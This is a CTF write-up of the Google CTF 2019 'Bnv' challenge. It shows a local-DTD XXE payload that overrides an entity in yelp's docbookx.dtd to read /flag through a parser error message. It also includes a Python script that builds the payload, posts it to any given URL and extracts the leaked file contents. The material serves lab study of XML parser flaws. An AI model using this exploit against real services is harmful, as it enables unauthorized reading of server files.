CTF Web Security

[GoogleCTF2019 Quals] Bnv (local DTD XXE)

Posted on 2020-03-31, 2 min read

Captured request:

POST /api/search HTTP/1.1
Host: e792cbca-d1bd-4263-a218-3ccd612c1195.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Referer: http://e792cbca-d1bd-4263-a218-3ccd612c1195.node3.buuoj.cn/
Content-Length: 38
Connection: close

{"message":"135601360123502401401250"}

The body seems to carry only a single JSON field. Trying SQL injection on it goes nowhere.
https://www.cnblogs.com/blacksunny/p/7891495.html
The post above points out that a JSON endpoint can also be a route to XXE if the backend accepts XML as well.
So rewrite the JSON body as XML and change the Content-Type from application/json to XML.

The server answers with: Validation failed: no DTD found !, line 2, column 9
So the document is being validated against a DTD, and that is exactly what the local-DTD technique needs.
https://www.dazhuanlan.com/2019/12/18/5df9cf41df595/
The idea: pick a DTD file that already exists on the target's filesystem and that declares a parameter entity and then references it (docbookx.dtd shipped with yelp declares and later references %ISOamso;). Load that file as an external parameter entity, but declare our own %ISOamso; before it. The first declaration of an entity wins, so when the external DTD reaches %ISOamso; it expands our replacement text instead of its own, and because that expansion now happens inside the external subset, the nested parameter-entity declarations and references in it are allowed (in the internal subset they would be rejected, which is why the nested % and & are written as &#x25; and &#x26;). Those nested declarations read /flag into %file;, bake its contents into the URI of a second external entity %error;, and then reference it; the parser fails to load file:///nonexistent/<flag contents> and echoes that path in the error message, which is how the flag comes back.

<?xml version="1.0"?>
<!DOCTYPE message[
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
    <!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///flag">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
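As an added example (not code from the writeup), a small Python client that generates the payload above from its plain, unescaped form, so the nested &#x25; / &#x26;#x25; / &#x27; encoding is produced mechanically instead of by hand, posts it with the Content-Type switched to XML, and pulls the leaked path out of the error text. Assumptions not stated on the page: the root element is <message>, the server embeds libxml2's "failed to load external entity" message inside its "Validation failed:" error, and SAMPLE_ERROR below is a constructed string in that shape, not a real response.

```python
"""Local-DTD XXE (error-based exfiltration): payload builder, sender, extractor.

Added example, not part of the original writeup. Assumptions: the target
accepts the XML as the POST body, the root element is <message>, and the
server echoes libxml2-style parse errors to the client.
"""
import http.client
import re
import sys
from urllib.parse import urlsplit

# The (local DTD, overridden parameter entity) pair used in the writeup.
LOCAL_DTD = "file:///usr/share/yelp/dtd/docbookx.dtd"
OVERRIDDEN_ENTITY = "ISOamso"

# Constructed sample of what the error text is assumed to look like.
SAMPLE_ERROR = (
    'Validation failed: failed to load external entity '
    '"file:///nonexistent/CTF{constructed_sample}", line 2, column 9'
)


def escape_for_literal(text: str, quote: str = "'") -> str:
    """Encode text so it can sit inside an entity-value literal delimited by `quote`.

    `&` is escaped first; otherwise the `&#x25;` inserted for `%` would be
    escaped a second time. Every nesting level adds one layer of this
    encoding, which is where the page's `&#x26;#x25;` comes from.
    """
    escaped = text.replace("&", "&#x26;").replace("%", "&#x25;")
    return escaped.replace(quote, "&#x27;" if quote == "'" else "&#x22;")


def build_payload(target_file: str = "file:///flag",
                  local_dtd: str = LOCAL_DTD,
                  entity: str = OVERRIDDEN_ENTITY,
                  root: str = "message") -> str:
    """Return the XML document that overrides `entity` in `local_dtd`."""
    # These declarations run inside the external DTD once %ISOamso; is
    # expanded there. In the external subset, PE references are allowed in
    # declarations, so %file; is expanded into the eval literal and %eval;
    # then declares `error` with the file content baked into its URI.
    inner = (
        f'\n<!ENTITY % file SYSTEM "{target_file}">'
        '\n<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM '
        "'file:///nonexistent/%file;'>\">"
        "\n%eval;"
        "\n%error;\n"
    )
    return (
        '<?xml version="1.0"?>\n'
        f"<!DOCTYPE {root} [\n"
        f'    <!ENTITY % local_dtd SYSTEM "{local_dtd}">\n'
        f"    <!ENTITY % {entity} '{escape_for_literal(inner)}'>\n"
        "    %local_dtd;\n"
        "]>\n"
        f"<{root}>x</{root}>\n"
    )


# The leaked file content is whatever follows the nonexistent/ prefix in the
# URI the parser failed to open.
LEAK_RE = re.compile(r'file:///nonexistent/([^"\'\s]*)')


def extract_leak(error_text: str):
    """Return the path component leaked in the error, or None if absent."""
    match = LEAK_RE.search(error_text)
    return match.group(1) if match else None


def send_payload(url: str, payload: str, timeout: float = 10.0) -> str:
    """POST the XML the way the writeup does: same endpoint, XML content type."""
    parts = urlsplit(url)
    conn = http.client.HTTPConnection(parts.hostname, parts.port or 80, timeout=timeout)
    conn.request("POST", parts.path or "/", body=payload.encode(),
                 headers={"Content-Type": "application/xml"})
    resp = conn.getresponse()
    body = resp.read().decode(errors="replace")
    conn.close()
    return body


if __name__ == "__main__":
    # Usage: python xxe_local_dtd.py http://<host>/api/search
    if len(sys.argv) > 1:
        response = send_payload(sys.argv[1], build_payload())
        print(extract_leak(response) or response)
    else:
        print(build_payload())
```

Two caveats that follow from how the trick works: the target file's contents end up inside a quoted system literal in a declaration, so a file containing `'`, `<`, `&` or `%` breaks the declaration instead of leaking, and the technique only works when the server reflects the parser's error text. The (DTD, entity) pair is parametrised so the same builder serves other local DTDs, but the pair the page relies on is docbookx.dtd with ISOamso.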
